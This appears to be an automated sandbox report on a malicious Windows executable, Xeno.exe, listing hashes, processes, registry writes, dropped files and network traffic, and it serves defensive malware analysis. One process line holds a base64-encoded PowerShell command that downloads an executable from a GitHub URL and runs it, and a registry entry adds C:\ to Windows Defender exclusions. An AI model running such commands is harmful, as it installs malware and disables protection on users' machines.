| File name: | Xeno.exe |
| Full analysis: | https://app.any.run/tasks/ad876edf-4bb1-4700-a0c7-2ceda1342e09 |
| Verdict: | Malicious activity |
| Analysis date: | May 31, 2025, 13:25:37 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 8 sections |
| MD5: | DC85EF47752545494EBDDECD61080CB5 |
| SHA1: | 8F738B79ECB93678B566BA63F424847D653C120C |
| SHA256: | FFDB6732E9D368651EF6E10072103C9A9D3AF6A6CED11D4BBE1998E42676C4CE |
| SSDEEP: | 6144:dr1G/1Abpl9VY8D7GnrlRnmtdKAS8nA80kUEntW:dwgYyuB8nAjkUEc |
| .exe | | | Win32 Executable MS Visual C++ (generic) (42.2) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (37.3) |
| .dll | | | Win32 Dynamic Link Library (generic) (8.8) |
| .exe | | | Win32 Executable (generic) (6) |
| .exe | | | Generic Win/DOS Executable (2.7) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2025:05:30 20:23:52+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 48 |
| CodeSize: | 320000 |
| InitializedDataSize: | 17408 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x400a |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.0.0.0 |
| ProductVersionNumber: | 1.0.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| Comments: | XenoUI |
| CompanyName: | XenoUI |
| FileDescription: | XenoUI.dll |
| FileVersion: | 1,2,0,0 |
| InternalName: | Xeno.exe |
| LegalCopyright: | Rizve |
| OriginalFileName: | Xeno.exe |
| ProductName: | Project Xeno by Rizve |
| ProductVersion: | 1,2,0,0 |
| AssemblyVersion: | 0.0.0.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 208 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 240 | C:\WINDOWS\system32\WerFault.exe -u -p 3896 -s 1364 | C:\Windows\System32\WerFault.exe | — | A3V8W1ZTYE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1052 | timeout 3 | C:\Windows\System32\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: timeout - pauses command processing Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1616 | "C:\Users\admin\AppData\Local\Temp\Config.exe" | C:\Users\admin\AppData\Local\Temp\Config.exe | — | Xeno.exe | |||||||||||
User: admin Company: XenoUI Integrity Level: HIGH Description: XenoUI Exit code: 2147516570 Version: 1.2.0 Modules
| |||||||||||||||
| 1676 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBtAG0AYQBsAG8AdgBlAHMAaQBjAGUAYwByAGUAYQBtAC8AVwBpAG4AZABvAHcAcwAtAFMAZQByAHYAaQBjAGUAcwAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgAKACQAbwB1AHQAcAB1AHQAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcAAvAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAiAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AdQB0AHAAdQB0AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2600 | "C:\Users\admin\AppData\Local\Temp\Xeno.exe" | C:\Users\admin\AppData\Local\Temp\Xeno.exe | — | explorer.exe | |||||||||||
User: admin Company: XenoUI Integrity Level: MEDIUM Description: XenoUI.dll Exit code: 3221226540 Version: 1,2,0,0 Modules
| |||||||||||||||
| 2644 | "C:\Users\admin\AppData\Local\Temp\Xeno.exe" | C:\Users\admin\AppData\Local\Temp\Xeno.exe | explorer.exe | ||||||||||||
User: admin Company: XenoUI Integrity Level: HIGH Description: XenoUI.dll Exit code: 0 Version: 1,2,0,0 Modules
| |||||||||||||||
| 2660 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp3168.tmp.bat"" | C:\Windows\System32\cmd.exe | — | RuntimeBroker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3896 | "C:\WINDOWS\A3V8W1ZTYE.exe" | C:\Windows\A3V8W1ZTYE.exe | RuntimeBroker.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Svchost Exit code: 2148734499 Version: 6.2.19041.5848 Modules
| |||||||||||||||
| (PID) Process: | (2644) Xeno.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids |
| Operation: | write | Name: | JSFile |
Value: | |||
| (PID) Process: | (7000) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe |
| Operation: | write | Name: | JScriptSetScriptStateStarted |
Value: B60A120000000000 | |||
| (PID) Process: | (5024) reg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths |
| Operation: | write | Name: | C:\ |
Value: | |||
| (PID) Process: | (240) WerFault.exe | Key: | \REGISTRY\A\{9fa01f82-8062-9304-4409-358cf5c2acb8}\Root\InventoryApplicationFile |
| Operation: | write | Name: | WritePermissionsCheck |
Value: 1 | |||
| (PID) Process: | (240) WerFault.exe | Key: | \REGISTRY\A\{9fa01f82-8062-9304-4409-358cf5c2acb8}\Root\InventoryApplicationFile\PermissionsCheckTestKey |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (240) WerFault.exe | Key: | \REGISTRY\A\{9fa01f82-8062-9304-4409-358cf5c2acb8}\Root\InventoryApplicationFile\a3v8w1ztye.exe|98f54fdf8c830d59 |
| Operation: | write | Name: | ProgramId |
Value: 00060b0d844db89c86a9985384bd7a1451a200000000 | |||
| (PID) Process: | (240) WerFault.exe | Key: | \REGISTRY\A\{9fa01f82-8062-9304-4409-358cf5c2acb8}\Root\InventoryApplicationFile\a3v8w1ztye.exe|98f54fdf8c830d59 |
| Operation: | write | Name: | FileId |
Value: 0000df58eae2774245bb16d9481834a3e329c2fa700a | |||
| (PID) Process: | (240) WerFault.exe | Key: | \REGISTRY\A\{9fa01f82-8062-9304-4409-358cf5c2acb8}\Root\InventoryApplicationFile\a3v8w1ztye.exe|98f54fdf8c830d59 |
| Operation: | write | Name: | LowerCaseLongPath |
Value: c:\windows\a3v8w1ztye.exe | |||
| (PID) Process: | (240) WerFault.exe | Key: | \REGISTRY\A\{9fa01f82-8062-9304-4409-358cf5c2acb8}\Root\InventoryApplicationFile\a3v8w1ztye.exe|98f54fdf8c830d59 |
| Operation: | write | Name: | LongPathHash |
Value: a3v8w1ztye.exe|98f54fdf8c830d59 | |||
| (PID) Process: | (240) WerFault.exe | Key: | \REGISTRY\A\{9fa01f82-8062-9304-4409-358cf5c2acb8}\Root\InventoryApplicationFile\a3v8w1ztye.exe|98f54fdf8c830d59 |
| Operation: | write | Name: | Name |
Value: A3V8W1ZTYE.exe | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2644 | Xeno.exe | C:\Windows\windows.js | text | |
MD5:217B3366A31C28893C787100D16A4AED | SHA256:79DC4067D03F3445F0D01CE9D2682D7943654B3977AFBC397E322EA064193BD3 | |||
| 2644 | Xeno.exe | C:\Users\admin\AppData\Local\Temp\Config.exe | executable | |
MD5:E129E4AC488952AD9D026A17C1057CEB | SHA256:55658C038D3CD6916BFC64AC5D779DD28B95CCF2C532B3F98DB124CEE9D3F3DA | |||
| 240 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_A3V8W1ZTYE.exe_9615dcdfccba1591642c7e566aed1a269426490_f5cc1bad_31b1247b-33fd-4182-a7b9-f977e48e5fbd\Report.wer | — | |
MD5:— | SHA256:— | |||
| 240 | WerFault.exe | C:\Users\admin\AppData\Local\CrashDumps\A3V8W1ZTYE.exe.3896.dmp | — | |
MD5:— | SHA256:— | |||
| 4016 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4jwbcjaa.4dh.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mq3uxyyk.e01.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hfik1b2o.doo.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d3d0gwwn.eig.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1676 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lw4h4mm0.lqd.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4016 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wqlcja5n.yax.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.20.245.137:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6960 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
8184 | RuntimeBroker.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1660 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.20.245.137:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
6960 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
6960 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1676 | powershell.exe | 140.82.121.4:443 | github.com | GITHUB | US | whitelisted |
1676 | powershell.exe | 185.199.108.133:443 | raw.githubusercontent.com | FASTLY | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
keyauth.win |
| malicious |
github.com |
| whitelisted |
raw.githubusercontent.com |
| whitelisted |
ip-api.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Potentially Bad Traffic | ET INFO KeyAuth Open-source Authentication System Domain in DNS Lookup (keyauth .win) |
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub |
2196 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
2196 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
8184 | RuntimeBroker.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ip-api.com |
8184 | RuntimeBroker.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api |